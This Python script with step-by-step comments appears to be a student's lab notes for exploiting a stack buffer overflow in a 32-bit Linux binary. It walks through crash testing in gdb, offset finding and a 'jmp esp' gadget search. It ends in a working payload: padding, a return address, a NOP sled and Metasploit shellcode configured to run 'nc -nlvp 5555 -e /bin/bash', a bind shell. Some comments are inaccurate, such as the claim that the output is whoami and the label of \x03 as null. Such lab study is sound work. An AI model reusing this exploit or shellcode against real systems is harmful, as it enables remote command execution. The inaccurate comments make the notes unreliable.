#!/usr/bin/python

# for linux binaries
#Step 1: Static analysis: file, strings, etc

#Step 2: Behavioral analysis: Run the program. Give it input. Give it lots of input to see if we can get a segmentation fault.
# Segmentation fault = we can do a buffer overflow

#Step 3: Disassembly with gdb
# student@lin-ops$ gdb [filename]
# gdb-peda$ disass main
# --This will disassemble main() and show us called functions within the program
# --We can look into called functions to find additional functions
# gdb-peda$ disass [function name] (i.e. disass getuserinput)
# -- google "vulnerable function [function name]" to see if there are known vulnerabilities, such as with gets and puts
# IF YOU HAVE gdb-peda INSTALLED
# gdb-peda$ pdisass main (or pdisass getuserinput etc)
# green means probably okay. Red means vulnerable. A green function can contain a red subfunction, so check your green functions as well

# Step 4: Run the program and crash it
# gdb-peda$ r
# provide input until we get the segmentation fault (just so many AAAAAAA's)
# in the registers info, our EIP should just have 0x41414141 ('AAAA'). This means I can overwrite the EIP
# It crashes because 0x41414141 is NOT a valid address for the next instruction. 
# If we can overwrite EIP, we can direct it where to go to execute code

# Step 5: "fuzz" the inputs to determine the offset
# navigate to https://wiremask.eu/tools/buffer-overflow-pattern-generator/
# generate a "random" string long enough to overflow the buffer
# gdp-peda$ r 
# --paste in the random string
# check the EIP register and copy the EIP hex value into the pattern-generator website. It will then tell you the offset.
# The offset is how many AAAA's we need to get to the EIP

# now begins the python coding
# buffer variable is the number of A's needed to reach EIP register (the offset)
# EIP variable is what we want to write to the EIP. We put four B's so we can make sure we landed exactly on target
# The C's in buf are to make sure we got it right
# When it crashes, our EIP should be BBBB. If there is an A, our offset is too long. If there is a C, our offset is too short.


#buffer = '\x41' * 62 #<bufferoffset>
#EIP = '\x42' * 4
#buf = '\x43' * 10


#then we combine it all and run it

#print(buffer+EIP+buf)

#save the script and run it
# gdb-peda$ r <<< $(python overflowscript.py)

#Hooray! Our EIP is BBBB! Time for the next step
# gdb-peda$ quit

# Step 6 - Find a good value for EIP

#student@lin-ops$ env - gdb [file]
# (gdb) unset env LINES
# (gdb) unset env COLUMNS
# (gdb) show env

#should get no results. This means we have successfully unset the enviroment variables

# then run it and crash it by any means. 

# (gdb) r
# and a bunch of AAAAAs until we get a segmentation fault

# Now that the program has run and faulted and dumped, we're going to need a map to find our way through this process

# (gdb) info proc map

# copy out the first address after the heap and the last address before the stack.

# first after heap: 0xf7de1000
# last before stack: 0xf7ffe000

# we want to seach between the heap and the stack for a 'jmp esp' command so we can point our EIP to the top of the stack. find bytes (/b) between the start of the HEAP and the start of the STACK, looking for jmp (0xff) esp (0xe4).


# (gdb) find /b 0xf7de1000,0xf7ffe000,0xff,0xe4

#it should return a bunch of memory addresses. Grab 3-5 of them. We only need one, but in case that one doesn't work, we can try another

# 0xf7de3b59
# 0xf7f588ab
# 0xf7f645fb
# 0xf7f6460f
# 0xf7f64aeb

buffer = '\x41' * 62 #62 = buffer offset
EIP = '\x59\x3b\xde\xf7' #reverse bytes b/c little endian

# add some nops for safety
nop = '\x90' * 15


# and now we make our shell code:
# in another window, run:

# $ msfconsole
# $ use payload/linux/x86/exec (if trying to gain command execution on an x86 linux system)
# $ show options (see what we can do)
# $ set CMD [whatever command you want to run]
# $ show options (make sure everything looks good)

# Now generate the shell code
# -b removes bad bytes. newline (x0a), end of file (x00) and null (x03), output for python code
# $ generate -b "\x00\x0a\x03" -f python
# copy all the output for shell code and also settings evaluation if it fails

# linux/x86/exec - 108 bytes
# https://metasploit.com/
# Encoder: x86/xor_dynamic
# VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
# PrependSetreuid=false, PrependSetuid=false, 
# PrependSetresgid=false, PrependSetregid=false, 
# PrependSetgid=false, PrependChrootBreak=false, 
# AppendExit=false, CMD=nc -nlvp 5555 -e /bin/bash, 
# NullFreeVersion=false
buf =  b""
buf += b"\xeb\x23\x5b\x89\xdf\xb0\x19\xfc\xae\x75\xfd\x89"
buf += b"\xf9\x89\xde\x8a\x06\x30\x07\x47\x66\x81\x3f\x52"
buf += b"\x64\x74\x08\x46\x80\x3e\x19\x75\xee\xeb\xea\xff"
buf += b"\xe1\xe8\xd8\xff\xff\xff\x02\x19\x68\x09\x5a\x9b"
buf += b"\x50\x64\x6a\x2f\x61\x8b\xe5\x6a\x2d\x71\x6a\x02"
buf += b"\x6a\x2d\x60\x6b\x6c\x8b\xe1\x50\xea\x19\x02\x02"
buf += b"\x02\x6c\x61\x22\x2f\x6c\x6e\x74\x72\x22\x37\x37"
buf += b"\x37\x37\x22\x2f\x67\x22\x2d\x60\x6b\x6c\x2d\x60"
buf += b"\x63\x71\x6a\x02\x55\x51\x8b\xe3\xcf\x82\x52\x64"



# and print it

print(buffer + EIP + nop + buf)

# If we run this, it should output the result of whoami. If we run this with sudo, that output should be root.
